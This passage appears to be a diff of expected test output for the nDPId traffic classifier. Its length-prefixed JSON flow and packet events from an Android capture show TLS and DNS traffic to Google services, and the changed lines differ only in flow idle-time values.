-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1582454871839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871839,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8witAAEAGtnDAqAIQ2O8meID2AbsYfvWoAAAAAKAC\/\/+9gwAAAgQFtAQCCAr\/\/zeDAAAAAAEDAwg="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1582454871848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871848,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8oe8AAHYGHXGs2RXKwKgCEAG7yuig7Cw9QmE\/LaAS6yAtmgAAAgQFZAQCCArvemfU\/\/83fQEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1582454871853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871853,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CFJAAEAGrRbAqAIQrNkVysroAbtCYT8toOwsPoAQAVdF2AAAAQEICv\/\/N4bvemfU"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1582454871853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871853,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AF8AAHUGgz3Y7yZ4wKgCEAG7gPZMYENyGH71qaAS6yCi0QAAAgQFZAQCCArDx9w1\/\/83gwEDAwg="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1582454871855,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871855,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0wixAAEAGtnfAqAIQ2O8meID2AbsYfvWpTGBDc4AQAVe7FAAAAQEICv\/\/N4fDx9w1"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1582454871867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871867,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8+7cAAHUGxias2RRMwKgCEAG7qn7jcCu5pd5966AS6yBHnwAAAgQFZAQCCArp2ZEZ\/\/83gAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1582454871873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871873,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SmtAAEAGbHvAqAIQrNkUTKp+Abul3n3r43AruoAQAVdf2wAAAQEICv\/\/N4vp2ZEZ"} 
-00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871814,"flow_last_seen":1582454871879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":594,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1582454871879,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871839,"flow_last_seen":1582454871880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871880,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871829,"flow_last_seen":1582454871829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871829,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1582454871829,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871829,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SmpAAEAGbHTAqAIQrNkUTKp+Abul3n3qAAAAAKAC\/\/+8ngAAAgQFtAQCCAr\/\/zeAAAAAAAEDAwg="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871839,"flow_last_seen":1582454871839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871839,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1582454871839,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871839,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8witAAEAGtnDAqAIQ2O8meID2AbsYfvWoAAAAAKAC\/\/+9gwAAAgQFtAQCCAr\/\/zeDAAAAAAEDAwg="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1582454871848,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871848,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8oe8AAHYGHXGs2RXKwKgCEAG7yuig7Cw9QmE\/LaAS6yAtmgAAAgQFZAQCCArvemfU\/\/83fQEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1582454871853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871853,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CFJAAEAGrRbAqAIQrNkVysroAbtCYT8toOwsPoAQAVdF2AAAAQEICv\/\/N4bvemfU"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1582454871853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871853,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AF8AAHUGgz3Y7yZ4wKgCEAG7gPZMYENyGH71qaAS6yCi0QAAAgQFZAQCCArDx9w1\/\/83gwEDAwg="} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1582454871855,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871855,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0wixAAEAGtnfAqAIQ2O8meID2AbsYfvWpTGBDc4AQAVe7FAAAAQEICv\/\/N4fDx9w1"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1582454871867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871867,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8+7cAAHUGxias2RRMwKgCEAG7qn7jcCu5pd5966AS6yBHnwAAAgQFZAQCCArp2ZEZ\/\/83gAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1582454871873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871873,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SmtAAEAGbHvAqAIQrNkUTKp+Abul3n3r43AruoAQAVdf2wAAAQEICv\/\/N4vp2ZEZ"} 
+00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871814,"flow_last_seen":1582454871879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":594,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1582454871879,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871839,"flow_last_seen":1582454871880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871880,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1582454871881,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1582454871881,"pkt":"xiwDYGpkTGr2n\/YnCABFAABErDBAAEARCRfAqAIQwKgCAZtQADUAMNjjuKUBAAABAAAAAAAAB2FuZHJvaWQKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="} 00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871829,"flow_last_seen":1582454871890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871890,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871839,"flow_last_seen":1582454871911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871911,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871814,"flow_last_seen":1582454871913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1582454871913,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871829,"flow_last_seen":1582454871890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871890,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871839,"flow_last_seen":1582454871911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871911,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871814,"flow_last_seen":1582454871913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1582454871913,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1582454871920,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1582454871920,"pkt":"TGr2n\/YnxiwDYGpkCABFAABUFXQAAEAR38PAqAIBwKgCEAA1m1AAQNQ0uKWBgAABAAEAAAAAB2FuZHJvaWQKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAARcABKzZFgo="} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454871920,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.10"}} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":447,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871829,"flow_last_seen":1582454871933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871933,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871947,"flow_last_seen":1582454871947,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871947,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1582454871947,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871947,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8i1NAAEAGKc3AqAIQrNkWCq1WAbtFj7zOAAAAAKAC\/\/\/ZVgAAAgQFtAQCCAr\/\/zedAAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1582454871972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871972,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8OOwAAHYGhjSs2RYKwKgCEAG7rVbtvX7+RY+8z6AS6yDuawAAAgQFZAQCCAq7R9gE\/\/83nQEDAwg="} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1582454871974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871974,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0i1RAAEAGKdTAqAIQrNkWCq1WAbtFj7zP7b1+\/4AQAVcGrAAAAQEICv\/\/N6S7R9gE"} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871947,"flow_last_seen":1582454872014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872014,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872015,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 